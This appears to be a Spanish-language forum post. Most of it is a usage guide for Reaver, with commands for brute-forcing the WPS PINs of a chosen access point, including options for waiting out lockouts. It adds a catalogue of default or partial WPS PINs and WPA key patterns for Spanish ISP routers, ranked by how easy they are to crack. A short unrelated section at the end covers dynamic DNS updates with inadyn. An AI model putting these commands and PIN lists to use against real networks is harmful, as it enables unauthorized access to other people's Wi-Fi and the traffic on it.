reaver nuevo ataque a wpa

Habitualmente, el único argumento requerido para Reaver es el nombre de la interfaz y el BSSID del AP objetivo:

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05
El canal y SSID (teniendo en cuenta que el SSID no esta encubierto) del AP objetivo son identificados automáticamente por Reaver, a menos que se especifique explícitamente en la línea de comando:

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
Por defecto, si el AP cambia canales, Reaver también cambiará su canal en consecuencia. Sin embargo, está característica puede ser desactivada “fijando” el canal de la interfaz.

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 --fixed
El tiempo de espera de recepción por defecto es 5 segundos. Este tiempo de espera puede ser configurado manualmente si fuera necesario (el tiempo de espera mínimo es 1 segundo):

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 -t 2
El tiempo de retraso por defecto entre intentos de pin es de 1 segundo. Este valor puede ser incrementado o decrementado a cualquiera valor entero no negativo. Un valor de cero significa sin retraso:

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Algunos APs bloquearán temporálmente su estado WPS, normalmente durante 5 minutos o menos, cuando es detectada actividad “sospechosa”. Por defecto cuando se detecta un estado bloqueado, Reaver comprobará el estado cada 315 segundos (5 minutos y 15 segundos) y no continuará haciendo fuerza bruta a los pins hasta que el estado del WPS esté desbloqueado. Esta comprobación puede ser incrementada o decrementada a cualquier valor entero no negativo:

Citar

reaver -i mon0 -b 00:01:02:03:04:05 –lock-delay=250

Para salidas adicionales, se debe proporcionar la opción “verbose”. Proporcionando la opción “verbose” dos veces se incrementará el nivel de detalle y se mostrará cada número pin intentado.

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 -vv
El tiempo de espera por defecto para recibir los mensajes de respuesta del WPS M5 y M7 es .1 segundos. Este tiempo de espera puede ser fijado manualmente si fuese necesario (tiempo de espera máximo 1 segundo).

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Algunas implementaciones WPS pobres tirarán la conexión, cuando se suministre un pin inválido en vez de responder con un mensaje NACK como dicen las especificaciones. Teniendo en cuenta esto, si se alcanza el tiempo de espera de mensaje M5/M7, es tratado por defecto como un NACK. Sin embargo, si se sabe que el AP envía NACKS (la mayoría lo hacen), esta característica puede ser desactivada para mayor exactitud. Esta opción está ampliamente en desuso ya que Reaver autodetectará si un AP responde adecuadamente con NACKs o no:

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 --nack
Aunque a la mayoría de los APs no les importa, enviar un mensaje EAP FAIL para cerrar una sesión WPA es necesario a veces. Por defecto esta característica esta deshabilitada, pero puede habilitarse para aquellos APs que la necesiten.

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
Cuando se encuentran 10 errores WPS consecutivos no esperados, se mostrará un mensaje de advertencia. Cómo esto es una señal de que el AP está limitado el ratio de intentos del pin o simplemente siendo desbordado, se fijará una pausa cuando aparezcan estos mensajes:

Código: [Seleccionar]

reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
¿Qué redes son mas viables para reaver?
Las mejores son COno, FTsEx, y algunas Jazzmusictel y Timofónicas, teniendo en cuenta, que si son wpa y tiene wps activado, también son vulnerables a reaver y son posibles sacar por ese proceso.
Aquí teneis desde la página oficial de reaver la lista de router conocidos y redes vulnerables a reaver :
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0
Pines Wpa y Wpa2 : (MIRAR WPSCRACKGUI SU BASE DE DATOS ANTES MENCIONADO)
WLAN TIMOFÓNICAS :
ESSID: WLAN_XXXX
BSSID: 00:19:15:XX:XX:XX
MODELO: AW4062
V. Firm: –
Wps Activado: Si
PIN: 12345670
——-
WLAN_XXXX
MAC:30:39:F2
Wps activado:si
Pin:1653XXXX
——-
ESSID: WLAN_XXXX
BSSID: 00:19:15:XX:XX:XX
MODELO:Tecom Co.Ltd
V. Firm: –
Wps Activado: Si
PIN: 12345670
——–
WLAN_XXXX
BSSID: DC:0B:1A
Pin: 1653
fabricante:ADB Broadband SpA
——
bssid: 30:39:F2:7x:xx:xx
essid: WLAN_AAxx
PIN WPS: 1670xxxx
WPA: TCmMSxxxxxxxxxxxxxxx
——–
ESSID: WLAN_XXXX
BSSID: 30:39:F2:XX:XX:XX
MODELO: Broadcom
V. Firm: –
Wps Activado: Si
Inicio PIN: 4329xxxx
——
ESSID: WLAN_XXXX
BSSID: 40:4A:03:XX:XX:XX
MODELO: ZYXELL P-870HW-51A V2
V. Firm: –
Wps Activado: Si
PIN: 11866428
——
ESSID: WLAN_XXXX
BSSID: 30:39:F2:XX:XX:XX
MODELO: –
V. Firm: –
Wps Activado: Si
Inicio PIN: 1670@@@@ // 4329@@@@ // 16538061
——
ESSID: WLAN_XXXX
BSSID: F4:3E:61:XX:XX:XX
MODELO: –
V. Firm: –
Wps Activado: Si
PIN: 12345670
——
ESSID: WLAN_XXXX
BSSID: 00:1A:2B:XX:XX:XX
MODELO: Comtrend Gigabit 802.11n
V. Firm: –
Wps Activado: Si
PIN: 8847@@@@
——
WLAN_XXXX
40:4A:03
WPS defecto: No
PIN – 1186xxxx
——
WLAN_XXXX
30:39:F2
1670xxxx
wps defecto: si
—–
WLAN_XXXX (Las XXXX son 4 números y todos menos el último coinciden con los 4 últimos parámetros de la MAC que cambia un 9 por una A )
Router: ZYXELL P-870HW-51A V2
MAC: 40:4A:03:XX:XX:XX
Pin activado por defecto: 1186XXXX
Contraseña 20 dígitos letras mayúsculas y números mezclados
Encriptación: WPA2-PSK AES
—–
WLAN_XXXX
MAC: 30:39:F2
Wps Activado: Si
PIN: 1653XXXX
——————————————————————————–
JAZZmusicTEL
ESSID: JAZZTEL_XXXX
BSSID: 00:38:72:XX:XX:XX
MODELO: AR-3025un
V. Firm: –
Wps Activado: Si
Inicio PIN: 1562@@@@
——-
ESSID: JAZZTEL_XXXX
BSSID: 00:38:72:XX:XX:XX
MODELO: AR-5387un
V. Firm: –
Wps Activado: Si
Inicio PIN: 1883@@@@
——
ESSID: JAZZTEL_XXXX
BSSID: 00:38:72:XX:XX:XX
MODELO: AR-5387un
V. Firm: –
Wps Activado: No
PIN: 18836486
——
ESSID: JAZZTEL_XXXX
BSSID: 64:68:0C:XX:XX:XX
MODELO: AR-5381u
V. Firm: –
Wps Activado: No
Inicio PIN: 1562@@@@
——
——————————————————————————–
FTsEx
ESSID: FTE-XXXX
BSSID: 84:A8:E4:XX:XX:XX
MODELO: –
V. Firm: –
Wps Activado: Si
Inicio PIN: 7996@@@@
——
ESSID: FTE-XXXX
BSSID: 04:C0:6F:XX:XX:XX
MODELO: –
V. Firm: –
Wps Activado: Si
Inicio PIN: 0751@@@@
——
ESSID: FTE_XXXX
BSSID: 20:2B:C1:XX:XX:XX
MODELO: Huawei HG532C
V. Firm: –
Wps Activado: Si
Inicio PIN: 1957@@@@
—–
FTE-XXXX
MAC: 84:A8:E4
Wps Activado: Si
PIN: 7996XXXX
—–
ESSID: FTE_XXXX
BSSID: 20:2B:C1:XX:XX:XX
MODELO: Huawei HG532C
V. Firm: –
Wps Activado: Si
Inicio PIN: 1957xxxx
—–
FTE-XXXX
MAC: 04:C0:6F
Wps Activado: Si
PIN: 0751XXXX
——————————————————————————–
COno
ESSID: ONO_XXXX (letras y numeros)
BSSID: A0:21:B7:XX:XX:XX
Pin: 6557
WPA clave: 16557XXXXX (10 numeros)
——–
M.A.C.: A0:21:B7:xx:xx:xx
PIN WPS: 0634xxxx
WPA: 634xxxxxxx
M. Router: Netgear
——–
ESSID: ONOXX97
BSSID: 74:44:01:XX:XX:97
MODELO: CG3100D
V. Firm: –
Wps Activado: Sí
PIN: 3555@@@@
——
ESSID: ONOXX19
BSSID: C0:3F:0E:XX:XX: 19
MODELO: CG3100D
V. Firm: –
Wps Activado: Sí
PIN: 8345@@@@
——
ESSID: ONOXXXX
BSSID: C4:3D:C7:XX:XX:XX
MODELO: –
V. Firm: –
Wps Activado: No
PIN: 5141@@@@
——
MAC-C4:3D:C7xxxxxx
ONOxxxx
PIN-5141xxxx
WPS Activado-NO
———–
ONOXXXX
WPS PIN-9522xxxx
WPA-PSK 195221xxxx
MAC-30:46:9Axxxxxx
WPS Activado- NO
—–
WPS PIN: 1504XXXX
WPA PSK: 9150XXXXXX
AP SSID: ONOXXXX
MAC: 30:46:9A:XX:XX:XX
——
WPS PIN-2503
WPA PSK-520
AP SSID-ONO35AE
MAC-CO:3F.0E
——————————————————————————–
Opange
ESSID: Orange-XXXX
BSSID: 5C:33:8E:XX:XX:X
MODELO: –
V. Firm: –
Wps Activado: Sí
PIN: 1111@@@@
——
orange-c6
ap mac-5c:33:8E:xx:xx:xx
wps locked-si
pin-1111xxxx
——-
orange-xxxx
mac-5c:33:8e:xx:XX:xx
wps locked-si
——————————————————————————–
WII
ESSID: WIFIXXXXXX
BSSID: 88:25:2C:XX:XX:X
MODELO: –
V. Firm: –
Wps Activado: Sí
PIN: 7654@@@@
——
LINK
mac-F4:EC:38xxxxxx
PT-link
PIN -1452xxxx
WPS Activado -si
————————–
MAC-F8:D1:11xxxxxx
PT-LINK
PIN-4867xxxx
WPS Activado -si
———————-
MAC-00:18:E7xxxxxx
D-LINK
PIN-1553xxxx
WPS Activado -si
————-
MAC-B0:48:7Axxxxxx
KTM
PIN-0055xxxx
————
Marca/modelo: D-Link DIR-600
MAC: 1C:7E:E5:XX:XX:XX
PIN por defecto: 6041XXXX
————–
TP-LINK_ECE1C2
Modelo TL-WR740N
Mac: F4EC38ECxxxx
PIN 146076XX
Redes Soportadas:
ONO1234
ONOABCD
ONOABCDEF
livebox-ABCD
Orange-ABCD
Tele2
WLAN_AB
WLAN_ABCD
JAZZTEL_ABCD
VodafoneABCD

Actualizar ip con no-ip o dyndns

En ciertos momentos tenemos que conectarnos a una maquina que tenemos conectada en casa bien sea un servidor web o nuestra propia maquina, para hacer algún retoque o recuperar el archivo que pensábamos que teníamos en el pen, y, la cual sabemos que esta conectada, así podremos acceder vía web ssh ftp telnet etc o crear un túnel, claro esta la ip es dinámica si no con recordar nuestra ip si es fija tendríamos suficiente. Algunos router tienen una casilla para actualizar automáticamente la ip en caso de cambio, aunque algunos de estos servicios son de pago o caducan, para eso utilizaremos no-ip.
Después de registrarnos en no-ip y elegir nuestro subdominio tenemos que instalar un cliente para notificar que cambiamos de ip.

Como instalar inadyn

sudo apt-get install inadyn

Una vez instalado, tenemos que añadir los datos necesarios para poder actualizar la ip

inadyn --dyndns_system default@no-ip.com -u USER -p PASS -a HOST --background

Ojo con los dobles guiones, cambiaremos USER por nuestro usuario de no-ip.info, PASS por la clave y HOST por nuestro dominio (p.e. atotclic.no-ip.info).
Ahora lo que nos interesa es hacer que cada vez que arrancamos el sistema, se ejecute la llamada a inadyn. Para hacerlo, solo debemos incluir la llamada anterior al fichero

sudo nano /etc/rc.local

hay que añadirlo antes del

exit 0

Podemos verificar que esta funcionando correctamente en

sudo tail /var/log/syslog

INADYN: Started ‘INADYN version 1.96’ – dynamic DNS updater.
I:INADYN: IP address for alias ‘******.no-ip.info’ needs update to ‘******